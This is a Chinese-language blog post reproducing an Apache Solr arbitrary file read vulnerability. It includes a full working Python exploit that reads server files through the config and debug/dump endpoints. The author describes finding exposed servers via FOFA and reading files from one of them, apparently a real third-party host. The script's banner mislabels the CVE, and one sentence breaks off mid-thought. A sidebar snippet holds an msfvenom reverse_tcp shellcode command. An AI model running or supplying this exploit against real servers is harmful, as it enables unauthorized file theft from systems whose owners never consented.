漏洞复现:(0day)Apache Solr 任意文件读取漏洞

最新推荐文章于 2024-09-20 19:31:23 发布
最新推荐文章于 2024-09-20 19:31:23 发布
阅读量751 收藏
点赞数
分类专栏: 漏洞学习 文章标签: 安全漏洞 java python solr
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44046248/article/details/114969832
版权

一、漏洞简介

Solr

Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。

特点

Solr是一个高性能,采用Java开发,基于Lucene的全文搜索服务器。同时对其进行了扩展,提供了比Lucene更为丰富的查询语言,同时实现了可配置、可扩展并对查询性能进行了优化,并且提供了一个完善的功能管理界面,是一款非常优秀的全文搜索引擎。

根据漏洞详细报告,在/solr/src/lucene/queryparser/src/java/org/apache/lucene/queryparser/xml/CoreParser.java

 


二、复现过程

FOFA搜索:app="Apache-Solr"

选一个进去,复制链接直接上脚本(peiqi师傅的)

输入ip加端口 连接成功,然后尝试读取用户文件,获取成功

 


import requests
import sys
import random
import re
import base64
import time
from lxml import etree
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning

def title():
    print('+------------------------------------------')
    print('+  \033[34mPOC_Des: http://wiki.peiqi.tech           \033[0m')
    print('+  \033[34mGithub : https://github.com/PeiQi0        \033[0m')
    print('+  \033[34m公众号  : PeiQi文库                        \033[0m')
    print('+  \033[34mVersion: Apache Solr < 8.2.0            \033[0m')
    print('+  \033[36m使用格式: python3 CVE-2019-0193.py       \033[0m')
    print('+  \033[36mUrl    >>> http://xxx.xxx.xxx.xxx:8983  \033[0m')
    print('+  \033[36mFile   >>> 文件名称或目录                  \033[0m')
    print('+------------------------------------------')

def POC_1(target_url):
    core_url = target_url + "/solr/admin/cores?indexInfo=false&wt=json"
    try:
        response = requests.request("GET", url=core_url, timeout=10)
        core_name = list(json.loads(response.text)["status"])[0]
        print("\033[32m[o] 成功获得core_name,Url为:" + target_url + "/solr/" + core_name + "/config\033[0m")
        return core_name
    except:
        print("\033[31m[x] 目标Url漏洞利用失败\033[0m")
        sys.exit(0)

def POC_2(target_url, core_name):
    vuln_url = target_url + "/solr/" + core_name + "/config"
    headers = {
        "Content-type":"application/json"
    }
    data = '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
        print("\033[36m[o] 正在准备文件读取...... \033[0m".format(target_url))
        if "This" in response.text and response.status_code == 200:
            print("\033[32m[o] 目标 {} 可能存在漏洞 \033[0m".format(target_url))
        else:
            print("\033[31m[x] 目标 {} 不存在漏洞\033[0m".format(target_url))
            sys.exit(0)

    except Exception as e:
        print("\033[31m[x] 请求失败 \033[0m", e)

def POC_3(target_url, core_name, File_name):
    vuln_url = target_url + "/solr/{}/debug/dump?param=ContentStreams".format(core_name)
    headers = {
        "Content-Type": "application/x-www-form-urlencoded"
    }
    data = 'stream.url=file://{}'.format(File_name)
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
        if "No such file or directory" in response.text:
            print("\033[31m[x] 读取{}失败 \033[0m".format(File_name))
        else:
            print("\033[36m[o] 响应为:\n{} \033[0m".format(json.loads(response.text)["streams"][0]["stream"]))


    except Exception as e:
        print("\033[31m[x] 请求失败 \033[0m", e)

if __name__ == '__main__':
    title()
    target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
    core_name = POC_1(target_url)
    POC_2(target_url, core_name)
    while True:
        File_name = str(input("\033[35mFile >>> \033[0m"))
        POC_3(target_url, core_name, File_name)

 

A3word_C
关注
专栏目录
Apache Solr 远程命令执行漏洞复现(CVE-2019-0193)
Heytoo的博客
06-29 856
Apache Solr 远程命令执行漏洞复现(CVE-2019-0193) 0x00 简介 Solr的目标用户:“需要搜索框、分面浏览(导航)或者两者结合的任何人”。 Solr的关键特性包括: 基于标准的开放接口——Solr搜索服务器支持通过XML、JSON和HTTP查询和获取结果。 易管理——Solr可以通过HTML页面管理,服务器统计数据以JMX输出,Solr配置通过XML完成。 分面浏览——搜索结果自动分类。 突出显示命中词——匹配的字符自动在搜索结果中...
漏洞复现Apache系列(二)之Solr漏洞复现
qq_45244158的博客
03-01 8278
漏洞复现Apache系列(二)之Solr漏洞复现
CVE-2017-12629-Apache Solr远程代码执行漏洞分析
最新发布
旺仔Sec&blog
09-20 1218
Apache Solr 是一个流行的开源企业搜索平台,广泛应用于各种企业级应用和网站中。2017 年,该漏洞被发现并公布,引起了广泛关注。 Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE),二者可以连接
漏洞复现Apache solr
weixin_68416970的博客
08-02 518
漏洞复现Apache solrApache Solr是一个开源的搜索服务,使用Java编写、运行在Servlet容器的一个独立的全文搜索服务器,是Apache Lucene项目的开源企业搜索平台
框架安全-CVE 复现&Apache Shiro&Apache Solr漏洞复现
zkaqlaoniao的博客
11-15 251
中间件及框架列表:IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic,JBoos,WebSphere,Jenkins ,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,Flask,jQuery 等常见开发框架1、开发框架-PHP-Laravel-Thinkphp2、开发框架-Javaweb-St2-Spring3、开发框架-Python-django-Flask。
Apache Solr最新版任意文件读取0day1
08-03
在最新的版本中,报告了一个未授权的任意文件读取0day漏洞,该漏洞允许攻击者通过特定的请求获取服务器上的任意文件内容,即使在默认配置下。以下是关于这个漏洞的详细解释和复现步骤。 0x01 正文全版本任意文件...
Apache Solr任意文件读取和SSRF漏洞的自动化挖掘
weixin_40418457的博客
03-18 712
漏洞描述 Apache Solr是一个开源的搜索服务,使用Java语言开发。Apache Solr的某些功能存在过滤不严格,在Apache Solr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或文件读取漏洞。 综上,存在两个漏洞任意文件读取和SSRF,同时SSRF也可以导致任意文件读取漏洞详情 两个漏洞在同一个HTTP请求中触发,分别对应不同的参数,触发漏洞的url为http://x.x.x.x:8983/solr/new_core/debug/dump?stream.
2021 HW 漏洞清单汇总 ( 附 poc )
热门推荐
gjgj的博客
04-23 1万+
2021 HW 漏洞清单汇总 2021.4.8——4.22 披露时间 涉及商家/产品漏洞描述 2021/04/08启明星辰天清汉马USG防火墙存在逻辑缺陷漏洞(历史漏洞) CNVD-2021-17391 启明星辰 天清汉马USG防火墙 逻辑缺陷漏洞 CNVD-2021-12793 2021/04/08禅道项目管理软件11.6禅道 11.6 sql注...
被攻击的一些重点系统漏洞整理
鱼的博客
08-18 1410
一、OA系统 泛微(Weaver-Ecology-OA) ???? 泛微OA E-cology RCE(CNVD-2019-32204) - 影响版本7.0/8.0/8.1/9.0 https://xz.aliyun.com/t/6560 ???? 泛微OA WorkflowCenterTreeData接口注入(限oracle数据库) https://zhuanlan.zhihu.com/p/86082614 ???? 泛微ecology OA数据库配置信息泄露 https://www.cnblogs.co
SpringBoot Starter Solr Search Engine Support
AI天才研究院
07-29 1039
2019年是搜索引擎热潮的开始。近几年,开源社区不断涌现出众多优秀的搜索引擎系统,如ElasticSearch、Solr等。与此同时,Spring Framework也迎来了对搜索引擎整合的新浪潮,通过Spring Data JPA/Hibernate Search或Spring Data Elasticsearch可以轻松实现基于Lucene、Elasticsearch或其他搜索引擎的集成。因此,越来越多的开发者开始关注并选择这些搜索引擎作为自己的后端数据存储方案。
solr 历史漏洞复现之RCE漏洞(CVE-2019-17558)
m0_66490812的博客
04-20 957
优先复现 Solr RCE 漏洞,严重等级较高漏洞Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞Solr系统上执行任意代码。
微信0DAY复现
nzyp_的博客
06-18 716
微信0day漏洞复现 之前做了一次复现,又过了一个多月发现步骤都忘了,所以还是记录下来,以供日后参考 影响版本: 微信版本:<=3.2.1.141 Chrome:<=89.0.4389.114 环境准备: 一台kali用于使用CS、一台靶机、一台VPS用于提供访问网站 漏洞原理: 该漏洞是基于谷歌浏览器内核中一个JavaScript引擎的远程代码执行漏洞。当用户使用谷歌Chrome浏览器或微软Edge浏览器加载PoC HTML及其相对应的JavaScript文件时,攻击者可以利用
chrome-0day简单复现
qq_51954912的博客
04-24 262
文章目录前言漏洞简介复现过程 前言 昨天学长说了一个chrome-0day漏洞,闲来无聊,简单复现一下。 漏洞简介 4月13日,国外安全研究员发布了 Chrome 远程代码执行漏洞 0day 的利用代码。Google 在代码库和 beta 测试版中修复了此漏洞,但未将更新推送至正式版,因此该漏洞可以威胁最新的 Chrome 浏览器正式版(89.0.4389.114)。 复现过程 首先,这个漏洞影响的版本是Google Chrome: <=89.0.4389.114 这里我就用89.0.4389.114
Apache Slor 任意文件读取
MachineGunJoe666
04-16 386
Apache Slor 任意文件读取 一、简介 Apache Solr是一个开源搜索服务引擎,Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。Apache-Solr任意文件读取漏洞漏洞,攻击者可以在未授权的情况下读取目标服务器敏感文件和相关内容。 二、影响版本 Apache Slor <=8.8.1(网上已有原版本,本次测试7.7.1版本,踩踩坑) 三、环境搭建 1.下载版本 wget https://archive.apache.org/di
某信0day漏洞复现
qq_46331143的博客
04-19 469
测试流程: 攻击机:kali,192.168.43.200 受害机:win10,192.168.43.107 测试版本: 首先生成一段shellcode: msfvemon -p windows/meterpreter/reverse_tcp lhost=192.168.43.200 lport=5555 -e x86/shikata_ga_nai -b "\x00" -i 15 -f num -o /root/payload.txt 此时在root用户家目录下生成了一段shellcode代码的txt文
Apache 紧急修复已遭利用且补丁不完整的 HTTP Server 0day
smellycat000的专栏
10-08 282
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士研究人员发现此前 Apache 发布的安全更新未能正确修复已遭利用的 0day (CVE-2021-41773),Apache 软件基金...
Apache HTTP Server路径遍历漏洞复现0day(CVE-2021-41773|CVE-2021-42013远程代码执行)
内心不种满鲜花就会长满杂草
10-09 5647
声明:请勿用于非法入侵,仅供检测与学习!传送门 ——>中华人民共和国网络安全法 漏洞描述 在 Apache HTTP Server 2.4.49 中对路径规范化所做的更改中发现了一个缺陷。攻击者可以使用路径遍历攻击将 URL 映射到预期文档根目录之外的文件。如果文档根目录之外的文件不受“要求全部拒绝”的保护,则这些请求可能会成功。此外,此缺陷可能会泄漏 CGI 脚本等解释文件的来源。已知此问题已被广泛利用。此问题仅影响 Apache 2.4.49 而不是早期版本。 fofa查询:server=.
Apache Solr/Lucene 0Day远程代码执行漏洞复现
skyxxb的博客
10-17 2135
Apache Solr/Lucene 0Day远程代码执行漏洞复现最近发现网络上Apache Solr/Lucene 存在远程代码执行漏洞,现进行复现
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值